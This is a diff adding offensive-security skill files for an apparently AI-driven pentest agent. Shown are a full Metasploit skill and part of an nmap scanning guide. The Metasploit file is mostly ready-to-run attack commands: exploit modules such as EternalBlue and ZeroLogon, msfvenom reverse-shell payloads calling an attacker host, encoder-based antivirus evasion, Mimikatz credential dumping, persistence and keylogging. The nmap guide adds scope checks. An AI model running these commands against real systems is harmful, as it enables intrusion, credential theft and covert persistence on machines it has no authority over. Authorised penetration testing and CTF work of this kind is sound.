- package/skills/offensive/airecon-fork/technologies-docker-container/SKILL.md +266 -0
- package/skills/offensive/airecon-fork/technologies-elasticsearch/SKILL.md +226 -0
- package/skills/offensive/airecon-fork/technologies-firebase-firestore/SKILL.md +213 -0
- package/skills/offensive/airecon-fork/technologies-frida-hooking/SKILL.md +387 -0
- package/skills/offensive/airecon-fork/technologies-gitlab-github/SKILL.md +259 -0
- package/skills/offensive/airecon-fork/technologies-jenkins/SKILL.md +256 -0
- package/skills/offensive/airecon-fork/technologies-kubernetes-pentest/SKILL.md +281 -0
- package/skills/offensive/airecon-fork/technologies-memcached/SKILL.md +230 -0
- package/skills/offensive/airecon-fork/technologies-mobile-app-pentesting/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/technologies-mongodb/SKILL.md +257 -0
- package/skills/offensive/airecon-fork/technologies-nginx-apache/SKILL.md +280 -0
- package/skills/offensive/airecon-fork/technologies-observability-stack-attacks/SKILL.md +501 -0
- package/skills/offensive/airecon-fork/technologies-redis/SKILL.md +236 -0
- package/skills/offensive/airecon-fork/technologies-supabase/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/technologies-tomcat/SKILL.md +232 -0
- package/skills/offensive/airecon-fork/tools-advanced-fuzzing/SKILL.md +351 -0
- package/skills/offensive/airecon-fork/tools-browser-automation/SKILL.md +300 -0
- package/skills/offensive/airecon-fork/tools-caido/SKILL.md +776 -0
- package/skills/offensive/airecon-fork/tools-code-review/SKILL.md +71 -0
- package/skills/offensive/airecon-fork/tools-dalfox/SKILL.md +189 -0
- package/skills/offensive/airecon-fork/tools-hashcat-john/SKILL.md +258 -0
- package/skills/offensive/airecon-fork/tools-impacket/SKILL.md +227 -0
- package/skills/offensive/airecon-fork/tools-install/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-metasploit/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/tools-nmap/SKILL.md +211 -0
- package/skills/offensive/airecon-fork/tools-nuclei/SKILL.md +175 -0
- package/skills/offensive/airecon-fork/tools-reporting/SKILL.md +47 -0
- package/skills/offensive/airecon-fork/tools-scripting/SKILL.md +1939 -0
- package/skills/offensive/airecon-fork/tools-semgrep/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-source-audit/SKILL.md +308 -0
- package/skills/offensive/airecon-fork/tools-sqlmap/SKILL.md +137 -0
- package/skills/offensive/airecon-fork/tools-tool-catalog/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/tools-wapiti/SKILL.md +293 -0
- package/skills/offensive/airecon-fork/vulnerabilities-2fa-bypass/SKILL.md +219 -0
- package/skills/offensive/airecon-fork/vulnerabilities-account-takeover/SKILL.md +223 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-schema-exposure/SKILL.md +849 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-testing/SKILL.md +278 -0
- package/skills/offensive/airecon-fork/vulnerabilities-auth-workflow/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-authentication-jwt/SKILL.md +158 -0
- package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
- package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
- package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
- package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
- package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
- package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
- package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
- package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
- package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
- package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
- package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
- package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
- package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
- package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
- package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
- package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
- package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
- package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
- package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
- package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
- package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
- package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
- package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
- package/skills/offensive/matty-fork/cicd-redteam/SKILL.md +531 -0
- package/skills/offensive/matty-fork/cloud-security/SKILL.md +106 -0
- package/skills/offensive/matty-fork/container-escape/SKILL.md +174 -0
- package/skills/offensive/matty-fork/mobile-pentester/SKILL.md +357 -0
- package/skills/offensive/matty-fork/subdomain-takeover/SKILL.md +154 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/README.md +92 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/SKILL.md +4177 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/README.md +66 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/SKILL.md +1695 -0
|
@@ -0,0 +1,270 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: metasploit
|
|
5
|
+
description: Metasploit Framework — module selection, msfconsole workflow, msfvenom payload generation, handlers, meterpreter post-exploitation, and common exploit modules for pentest/CTF
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# Metasploit Framework
|
|
9
|
+
|
|
10
|
+
Metasploit = exploitation framework with 2000+ modules. Use for: exploit delivery, payload generation (msfvenom), reverse shell management, and post-exploitation via Meterpreter.
|
|
11
|
+
|
|
12
|
+
**Install:**
|
|
13
|
+
```
|
|
14
|
+
sudo apt-get install -y metasploit-framework
|
|
15
|
+
# Start DB (required for search to work fast):
|
|
16
|
+
sudo systemctl start postgresql
|
|
17
|
+
sudo msfdb init
|
|
18
|
+
```
|
|
19
|
+
|
|
20
|
+
---
|
|
21
|
+
|
|
22
|
+
## msfconsole Basics
|
|
23
|
+
|
|
24
|
+
# Start:
|
|
25
|
+
msfconsole
|
|
26
|
+
msfconsole -q # Quiet mode (no banner)
|
|
27
|
+
|
|
28
|
+
# Basic commands:
|
|
29
|
+
search <keyword> # Find modules: search ms17-010, search eternalblue
|
|
30
|
+
search type:exploit name:tomcat
|
|
31
|
+
search cve:2021-44228
|
|
32
|
+
|
|
33
|
+
use <module_path> # Load module: use exploit/windows/smb/ms17_010_eternalblue
|
|
34
|
+
info # Show module details + all options
|
|
35
|
+
show options # Show required/optional options
|
|
36
|
+
show payloads # List compatible payloads for current module
|
|
37
|
+
show targets # List target OS/arch options
|
|
38
|
+
|
|
39
|
+
set RHOSTS <target_ip> # Set target
|
|
40
|
+
set RPORT <port> # Set target port
|
|
41
|
+
set LHOST <attacker_ip> # Set local IP for reverse shell
|
|
42
|
+
set LPORT 4444 # Set listener port
|
|
43
|
+
set PAYLOAD <payload> # Set payload (e.g., windows/x64/meterpreter/reverse_tcp)
|
|
44
|
+
|
|
45
|
+
check # Check if target is vulnerable (if module supports it)
|
|
46
|
+
run # Execute module
|
|
47
|
+
exploit # Same as run
|
|
48
|
+
|
|
49
|
+
# Session management:
|
|
50
|
+
sessions -l # List active sessions
|
|
51
|
+
sessions -i 1 # Interact with session 1
|
|
52
|
+
background # Background current session (Ctrl+Z also works)
|
|
53
|
+
sessions -k 1 # Kill session 1
|
|
54
|
+
|
|
55
|
+
---
|
|
56
|
+
|
|
57
|
+
## Common Exploit Modules
|
|
58
|
+
|
|
59
|
+
### Windows
|
|
60
|
+
|
|
61
|
+
# EternalBlue — MS17-010 (Windows 7/2008):
|
|
62
|
+
use exploit/windows/smb/ms17_010_eternalblue
|
|
63
|
+
set RHOSTS <target>
|
|
64
|
+
set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
|
65
|
+
set LHOST <attacker>
|
|
66
|
+
run
|
|
67
|
+
|
|
68
|
+
# PrintNightmare — CVE-2021-1675:
|
|
69
|
+
use exploit/windows/dcerpc/cve_2021_1675_printspooler
|
|
70
|
+
set RHOSTS <target>
|
|
71
|
+
set LHOST <attacker>
|
|
72
|
+
run
|
|
73
|
+
|
|
74
|
+
# Rejetto HFS — CVE-2014-6287:
|
|
75
|
+
use exploit/windows/http/rejetto_hfs_exec
|
|
76
|
+
set RHOSTS <target>
|
|
77
|
+
set RPORT 80
|
|
78
|
+
run
|
|
79
|
+
|
|
80
|
+
# ZeroLogon — CVE-2020-1472:
|
|
81
|
+
use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
|
|
82
|
+
set RHOSTS <dc_ip>
|
|
83
|
+
set NBNAME <domain_controller_name>
|
|
84
|
+
run
|
|
85
|
+
|
|
86
|
+
### Web
|
|
87
|
+
|
|
88
|
+
# Apache Struts — S2-045:
|
|
89
|
+
use exploit/multi/http/struts2_content_type_ognl
|
|
90
|
+
set RHOSTS <target>
|
|
91
|
+
set RPORT 8080
|
|
92
|
+
set LHOST <attacker>
|
|
93
|
+
run
|
|
94
|
+
|
|
95
|
+
# Tomcat Manager WAR upload:
|
|
96
|
+
use exploit/multi/http/tomcat_mgr_upload
|
|
97
|
+
set RHOSTS <target>
|
|
98
|
+
set HttpUsername tomcat
|
|
99
|
+
set HttpPassword tomcat
|
|
100
|
+
set LHOST <attacker>
|
|
101
|
+
run
|
|
102
|
+
|
|
103
|
+
# PHP CGI argument injection:
|
|
104
|
+
use exploit/multi/http/php_cgi_arg_injection
|
|
105
|
+
set RHOSTS <target>
|
|
106
|
+
run
|
|
107
|
+
|
|
108
|
+
# Jenkins Script Console RCE:
|
|
109
|
+
use exploit/multi/http/jenkins_script_console
|
|
110
|
+
set RHOSTS <target>
|
|
111
|
+
set LHOST <attacker>
|
|
112
|
+
run
|
|
113
|
+
|
|
114
|
+
### Linux
|
|
115
|
+
|
|
116
|
+
# vsftpd 2.3.4 backdoor:
|
|
117
|
+
use exploit/unix/ftp/vsftpd_234_backdoor
|
|
118
|
+
set RHOSTS <target>
|
|
119
|
+
run
|
|
120
|
+
|
|
121
|
+
# Shellshock:
|
|
122
|
+
use exploit/multi/http/apache_mod_cgi_bash_env_exec
|
|
123
|
+
set RHOSTS <target>
|
|
124
|
+
set TARGETURI /cgi-bin/vulnerable.cgi
|
|
125
|
+
run
|
|
126
|
+
|
|
127
|
+
### Post-Exploitation
|
|
128
|
+
|
|
129
|
+
# Dump credentials:
|
|
130
|
+
use post/windows/gather/credentials/credential_collector
|
|
131
|
+
use post/multi/recon/local_exploit_suggester
|
|
132
|
+
|
|
133
|
+
# Hashdump:
|
|
134
|
+
use post/windows/gather/hashdump
|
|
135
|
+
|
|
136
|
+
---
|
|
137
|
+
|
|
138
|
+
## Handlers — Receiving Reverse Shells
|
|
139
|
+
|
|
140
|
+
# Multi-handler (generic reverse shell listener):
|
|
141
|
+
use exploit/multi/handler
|
|
142
|
+
set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
|
143
|
+
set LHOST <attacker>
|
|
144
|
+
set LPORT 4444
|
|
145
|
+
set ExitOnSession false # Keep handler running after session
|
|
146
|
+
run -j # Run as background job
|
|
147
|
+
|
|
148
|
+
# Also accepts non-meterpreter shells:
|
|
149
|
+
set PAYLOAD linux/x64/shell/reverse_tcp
|
|
150
|
+
|
|
151
|
+
---
|
|
152
|
+
|
|
153
|
+
## msfvenom — Payload Generation
|
|
154
|
+
|
|
155
|
+
# List all payloads:
|
|
156
|
+
msfvenom -l payloads | grep "windows/x64"
|
|
157
|
+
msfvenom -l payloads | grep "linux/x64"
|
|
158
|
+
|
|
159
|
+
# Windows x64 reverse TCP meterpreter:
|
|
160
|
+
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f exe -o shell.exe
|
|
161
|
+
|
|
162
|
+
# Windows x86 (32-bit):
|
|
163
|
+
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f exe -o shell32.exe
|
|
164
|
+
|
|
165
|
+
# Linux ELF:
|
|
166
|
+
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f elf -o shell.elf
|
|
167
|
+
chmod +x shell.elf
|
|
168
|
+
|
|
169
|
+
# PHP webshell:
|
|
170
|
+
msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f raw -o shell.php
|
|
171
|
+
|
|
172
|
+
# Python:
|
|
173
|
+
msfvenom -p python/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f raw -o shell.py
|
|
174
|
+
|
|
175
|
+
# WAR (Tomcat):
|
|
176
|
+
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f war -o shell.war
|
|
177
|
+
|
|
178
|
+
# PowerShell one-liner:
|
|
179
|
+
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f psh-cmd
|
|
180
|
+
|
|
181
|
+
# Base64-encoded:
|
|
182
|
+
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f exe | base64
|
|
183
|
+
|
|
184
|
+
# With encoder (basic AV evasion):
|
|
185
|
+
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 \
|
|
186
|
+
-e x64/xor_dynamic -i 3 -f exe -o shell_encoded.exe
|
|
187
|
+
|
|
188
|
+
---
|
|
189
|
+
|
|
190
|
+
## Meterpreter Commands
|
|
191
|
+
|
|
192
|
+
# System info:
|
|
193
|
+
sysinfo # OS + hostname + arch
|
|
194
|
+
getuid # Current user
|
|
195
|
+
getpid # Current process ID
|
|
196
|
+
ps # Process list
|
|
197
|
+
|
|
198
|
+
# Privilege escalation:
|
|
199
|
+
getsystem # Auto privesc attempt (several techniques)
|
|
200
|
+
getprivs # List privileges
|
|
201
|
+
migrate <pid> # Migrate to another process (e.g., explorer.exe)
|
|
202
|
+
|
|
203
|
+
# File operations:
|
|
204
|
+
ls # List directory
|
|
205
|
+
cd C:\\Users
|
|
206
|
+
pwd
|
|
207
|
+
download C:\\Users\\admin\\Desktop\\flag.txt /home/kali/
|
|
208
|
+
upload /home/kali/tool.exe C:\\Temp\\tool.exe
|
|
209
|
+
|
|
210
|
+
# Shell:
|
|
211
|
+
shell # Drop to cmd.exe shell
|
|
212
|
+
# Ctrl+Z = background shell back to meterpreter
|
|
213
|
+
|
|
214
|
+
# Credential extraction:
|
|
215
|
+
hashdump # Dump local SAM hashes
|
|
216
|
+
run post/windows/gather/credentials/credential_collector
|
|
217
|
+
load kiwi # Load Mimikatz module
|
|
218
|
+
creds_all # Dump all credentials via Kiwi/Mimikatz
|
|
219
|
+
|
|
220
|
+
# Networking:
|
|
221
|
+
ipconfig # Network interfaces
|
|
222
|
+
route # Routing table
|
|
223
|
+
portfwd add -l 3306 -p 3306 -r <internal_host> # Port forward
|
|
224
|
+
run auxiliary/server/socks4a # SOCKS proxy through session
|
|
225
|
+
|
|
226
|
+
# Persistence:
|
|
227
|
+
run persistence -S -U -X -i 5 -p 4444 -r <attacker>
|
|
228
|
+
# -S = startup, -U = user login, -X = system boot
|
|
229
|
+
|
|
230
|
+
# Screenshots / keylogger:
|
|
231
|
+
screenshot # Take screenshot
|
|
232
|
+
keyscan_start # Start keylogger
|
|
233
|
+
keyscan_dump # Dump keystrokes
|
|
234
|
+
keyscan_stop
|
|
235
|
+
|
|
236
|
+
---
|
|
237
|
+
|
|
238
|
+
## Auxiliary Modules (Scanners)
|
|
239
|
+
|
|
240
|
+
# SMB version scan:
|
|
241
|
+
use auxiliary/scanner/smb/smb_version
|
|
242
|
+
set RHOSTS 10.10.10.0/24
|
|
243
|
+
run
|
|
244
|
+
|
|
245
|
+
# HTTP version:
|
|
246
|
+
use auxiliary/scanner/http/http_version
|
|
247
|
+
set RHOSTS 10.10.10.0/24
|
|
248
|
+
run
|
|
249
|
+
|
|
250
|
+
# Credential brute force:
|
|
251
|
+
use auxiliary/scanner/ssh/ssh_login
|
|
252
|
+
set RHOSTS <target>
|
|
253
|
+
set USER_FILE users.txt
|
|
254
|
+
set PASS_FILE passwords.txt
|
|
255
|
+
run
|
|
256
|
+
|
|
257
|
+
---
|
|
258
|
+
|
|
259
|
+
## Pro Tips
|
|
260
|
+
|
|
261
|
+
1. `search cve:XXXX-XXXXX` → fastest way to find module for a known CVE
|
|
262
|
+
2. Always `set ExitOnSession false` on handler → keeps listening after first connection
|
|
263
|
+
3. `migrate` to stable process (explorer.exe, svchost.exe) immediately after meterpreter session
|
|
264
|
+
4. `load kiwi` + `creds_all` = Mimikatz in memory without writing to disk
|
|
265
|
+
5. `run local_exploit_suggester` in meterpreter → automatic privesc enumeration
|
|
266
|
+
6. `portfwd` in meterpreter = port forwarding through session without extra tools
|
|
267
|
+
|
|
268
|
+
## Summary
|
|
269
|
+
|
|
270
|
+
Metasploit workflow: `msfconsole` → `search` CVE/service → `use` module → `set RHOSTS/LHOST/PAYLOAD` → `check` → `run` → meterpreter: `getsystem`, `hashdump`, `load kiwi`. msfvenom: generate standalone payloads for any format (exe, elf, war, php). Multi/handler = always-on reverse shell catcher for any payload.
|
|
@@ -0,0 +1,211 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
# nmap & naabu — Usage Guide for AIRecon
|
|
4
|
+
|
|
5
|
+
nmap and naabu are port scanners and service fingerprinters. They are infrastructure-level tools
|
|
6
|
+
that answer "what is listening on this host?" — not "what vulnerability exists here?" Understanding
|
|
7
|
+
the distinction is critical. Port scan results are raw data that require manual interpretation and
|
|
8
|
+
correlation before any further action is taken.
|
|
9
|
+
|
|
10
|
+
---
|
|
11
|
+
|
|
12
|
+
## MANDATORY PRE-CONDITIONS (All must be true before using nmap or naabu)
|
|
13
|
+
|
|
14
|
+
[ ] You have confirmed the target is within scope — IP, hostname, or CIDR explicitly authorized.
|
|
15
|
+
[ ] For domain-based targets: DNS resolution has been performed and you are scanning the IP,
|
|
16
|
+
not passing a domain name to masscan (masscan requires IP addresses only).
|
|
17
|
+
[ ] You have a specific reason to port scan this host — what are you trying to learn?
|
|
18
|
+
State it: "I am scanning to determine if port 8080 is open because the JS referenced
|
|
19
|
+
an internal API on that port" — NOT "I am scanning because it is the next step."
|
|
20
|
+
[ ] output/host_profiles.json either has an entry for this host already, or you are creating
|
|
21
|
+
the entry — port scan results must be written into the host profile immediately after.
|
|
22
|
+
|
|
23
|
+
Port scanning without a stated purpose is reconnaissance noise, not intelligence.
|
|
24
|
+
|
|
25
|
+
---
|
|
26
|
+
|
|
27
|
+
## What Port Scanning Tells You (and What It Does Not)
|
|
28
|
+
|
|
29
|
+
WHAT IT TELLS YOU:
|
|
30
|
+
- Which TCP/UDP ports are open (accepting connections)
|
|
31
|
+
- Service banners and version strings (with -sV)
|
|
32
|
+
- Operating system fingerprint (with -O, requires root)
|
|
33
|
+
- Response behavior under different probe types
|
|
34
|
+
|
|
35
|
+
WHAT IT DOES NOT TELL YOU:
|
|
36
|
+
- Whether a web application on port 8080 is vulnerable
|
|
37
|
+
- Whether a service is exploitable
|
|
38
|
+
- What the business logic of an application is
|
|
39
|
+
- Anything about authentication, authorization, or input handling
|
|
40
|
+
|
|
41
|
+
A port scan result is the BEGINNING of investigation for each discovered service.
|
|
42
|
+
It is not a vulnerability finding. It is not a reason to run an exploit scanner.
|
|
43
|
+
Every open port requires manual investigation: what is running? what version? what does it do?
|
|
44
|
+
|
|
45
|
+
---
|
|
46
|
+
|
|
47
|
+
## Scan Types and When to Use Each
|
|
48
|
+
|
|
49
|
+
REACHABILITY CHECK (before host profile — lightweight):
|
|
50
|
+
Purpose: Quickly confirm which hosts are alive before heavier enumeration.
|
|
51
|
+
Use: At the start, before manual profiling, to prioritize which hosts to investigate.
|
|
52
|
+
Command pattern: ping sweep or fast TCP check on common ports only.
|
|
53
|
+
Output: Feed into host prioritization — NOT into automated scanners.
|
|
54
|
+
|
|
55
|
+
TOP PORTS SCAN (during host profiling):
|
|
56
|
+
Purpose: Understand the service landscape of a specific host you are manually profiling.
|
|
57
|
+
Use: As part of STEP 3 manual profiling — one scan per host, recorded in host_profiles.json.
|
|
58
|
+
Prerequisite: You are actively profiling this host, not bulk-scanning a list.
|
|
59
|
+
Command pattern: top 1000 ports, version detection, default scripts on confirmed live host.
|
|
60
|
+
|
|
61
|
+
TARGETED SERVICE SCAN (after finding a specific open port):
|
|
62
|
+
Purpose: Deep fingerprint a specific service already discovered on a specific port.
|
|
63
|
+
Use: When a port is open and you want version, OS, and NSE script output for that service.
|
|
64
|
+
Prerequisite: The port was already found in a previous scan. You are now going deeper.
|
|
65
|
+
Command pattern: single port, full version detection, relevant NSE scripts only.
|
|
66
|
+
|
|
67
|
+
FULL PORT SCAN (when top ports reveal nothing interesting):
|
|
68
|
+
Purpose: Check all 65535 ports for unusual services on non-standard ports.
|
|
69
|
+
Use: Only after top port scan finds nothing interesting and you have a specific reason to
|
|
70
|
+
believe non-standard ports are in use (e.g., JS references to :4000, :9000, :15000).
|
|
71
|
+
Command pattern: full range, SYN scan, lower speed to avoid detection.
|
|
72
|
+
|
|
73
|
+
UDP SCAN (specific service investigation only):
|
|
74
|
+
Purpose: Detect UDP services like DNS, SNMP, NTP, TFTP.
|
|
75
|
+
Use: Only when you have a specific hypothesis about a UDP service.
|
|
76
|
+
Prerequisite: Root privileges required. Slow — do not run against all hosts.
|
|
77
|
+
|
|
78
|
+
---
|
|
79
|
+
|
|
80
|
+
## TWO-PASS SCANNING WORKFLOW (preferred — do not skip pass 1)
|
|
81
|
+
|
|
82
|
+
The two-pass approach avoids running -sV on all ports (slow + noisy) by first finding open ports,
|
|
83
|
+
then running service detection ONLY on those ports. Always prefer this over a single full scan.
|
|
84
|
+
|
|
85
|
+
PASS 1 — Discovery (fast, finds open ports):
|
|
86
|
+
nmap -n -Pn --top-ports 100 --open -T4 --max-retries 1 --host-timeout 90s -oN output/nmap_quick.txt <host>
|
|
87
|
+
Extract open ports: grep "^[0-9]" output/nmap_quick.txt | cut -d/ -f1 | paste -sd,
|
|
88
|
+
|
|
89
|
+
PASS 2 — Enrichment (service detection on discovered ports only):
|
|
90
|
+
nmap -n -Pn -sV -sC -p <comma_ports_from_pass1> --script-timeout 30s --host-timeout 3m -oN output/nmap_services.txt <host>
|
|
91
|
+
|
|
92
|
+
No-root fallback (when SYN scan not available):
|
|
93
|
+
nmap -n -Pn -sT --top-ports 100 --open --host-timeout 90s <host>
|
|
94
|
+
|
|
95
|
+
Prefer naabu for broad initial port discovery (faster):
|
|
96
|
+
naabu -host <host> -top-ports 1000 -silent -o output/ports.txt
|
|
97
|
+
Then feed to nmap enrichment: nmap -n -Pn -sV -sC -p $(cat output/ports.txt | grep -oP ':\K\d+' | paste -sd,) <host>
|
|
98
|
+
|
|
99
|
+
---
|
|
100
|
+
|
|
101
|
+
## Usage Patterns
|
|
102
|
+
|
|
103
|
+
Standard host profile scan (top ports, version detection):
|
|
104
|
+
sudo nmap -sS -sV -sC --open -p- --min-rate 1000 <host> -oA output/nmap_<host>
|
|
105
|
+
|
|
106
|
+
Fast top-1000 ports (for initial host profiling):
|
|
107
|
+
sudo nmap -sS --open --top-ports 1000 <host> -oN output/nmap_quick_<host>.txt
|
|
108
|
+
|
|
109
|
+
Targeted single-port deep scan (after discovering an interesting port):
|
|
110
|
+
sudo nmap -sV -sC -p <port> <host> --script=<relevant_script> -oN output/nmap_port<port>_<host>.txt
|
|
111
|
+
|
|
112
|
+
Full port range (only when specifically justified):
|
|
113
|
+
sudo nmap -sS -p- --min-rate 5000 <host> -oN output/nmap_fullports_<host>.txt
|
|
114
|
+
|
|
115
|
+
Light reachability check across resolved hosts (before profiling):
|
|
116
|
+
naabu -l output/resolved.txt -top-ports 1000 -o output/ports_naabu.txt
|
|
117
|
+
|
|
118
|
+
UDP scan for specific services (requires strong justification):
|
|
119
|
+
sudo nmap -sU -p 53,161,123,69 <host> -oN output/nmap_udp_<host>.txt
|
|
120
|
+
|
|
121
|
+
nrich — passive IP enrichment (no API key, uses Shodan InternetDB):
|
|
122
|
+
# After collecting IPs, enrich with known ports/CVEs/tags from Shodan InternetDB:
|
|
123
|
+
cat output/live_ips.txt | nrich - # Enrich all IPs
|
|
124
|
+
echo "1.2.3.4" | nrich - # Single IP
|
|
125
|
+
cat output/live_ips.txt | nrich - -json > output/nrich_results.json
|
|
126
|
+
|
|
127
|
+
# nrich returns per-IP: open_ports, cves, cpes, tags (no active scan — purely passive lookup)
|
|
128
|
+
# Perfect complement to nmap: use nrich BEFORE active scan to pre-check known exposure
|
|
129
|
+
# Install: go install github.com/projectdiscovery/nrich/cmd/nrich@latest
|
|
130
|
+
|
|
131
|
+
NEVER use these patterns:
|
|
132
|
+
nmap -iL output/live_hosts.txt -A (aggressive scan on unknown list, no purpose stated)
|
|
133
|
+
nmap <IP> -sV --script=vuln (vuln script category = automated spray, banned)
|
|
134
|
+
masscan output/live_hosts.txt (masscan requires IPs, not hostnames)
|
|
135
|
+
|
|
136
|
+
NSE SCRIPTS — USE SELECTIVELY:
|
|
137
|
+
Default scripts (-sC) are acceptable during host profiling.
|
|
138
|
+
The "vuln" script category is FORBIDDEN — it is equivalent to running an automated vuln scanner.
|
|
139
|
+
Select specific NSE scripts only when you have a hypothesis about a specific service.
|
|
140
|
+
Example: if you found Apache Struts, use --script=http-struts2-* NOT --script=vuln.
|
|
141
|
+
|
|
142
|
+
---
|
|
143
|
+
|
|
144
|
+
## Interpreting Results — Mandatory Steps After Every Scan
|
|
145
|
+
|
|
146
|
+
After nmap or naabu completes, for EVERY open port found:
|
|
147
|
+
|
|
148
|
+
STEP 1: Identify the service running on that port.
|
|
149
|
+
Do NOT trust the service label alone. Banner says "Apache httpd" — visit it in the browser.
|
|
150
|
+
Banner says "OpenSSH 7.4" — note the version, look up its CVE history, but do NOT auto-exploit.
|
|
151
|
+
|
|
152
|
+
STEP 2: Manually investigate the service.
|
|
153
|
+
For web ports (80, 443, 8080, 8443, 3000, 4000, 5000, etc.):
|
|
154
|
+
→ browser_action: visit the port, view source, observe the application.
|
|
155
|
+
For non-web ports (SSH, FTP, SMTP, Redis, MongoDB, etc.):
|
|
156
|
+
→ Manual banner grab: nc -v <host> <port> or curl telnet://<host>:<port>
|
|
157
|
+
→ Identify: is this expected? is it exposed unintentionally? is it authenticated?
|
|
158
|
+
|
|
159
|
+
STEP 3: Record in host_profiles.json.
|
|
160
|
+
For each open port: { "port": N, "service": "...", "version": "...", "notes": "..." }
|
|
161
|
+
Document what you manually observed, not just what nmap guessed.
|
|
162
|
+
|
|
163
|
+
STEP 4: Form a hypothesis before taking further action.
|
|
164
|
+
"Port 6379 is open and appears to be Redis — is it authenticated? I will test with redis-cli."
|
|
165
|
+
"Port 9200 is open and appears to be Elasticsearch — is the API exposed without auth?"
|
|
166
|
+
DO NOT: "Port 9200 is open, run nuclei against it." — this is the forbidden pattern.
|
|
167
|
+
|
|
168
|
+
STEP 5: Manually verify the hypothesis.
|
|
169
|
+
Before using any automated scanner against a discovered service, manually confirm:
|
|
170
|
+
- Is it actually that service? (version banner, behavior)
|
|
171
|
+
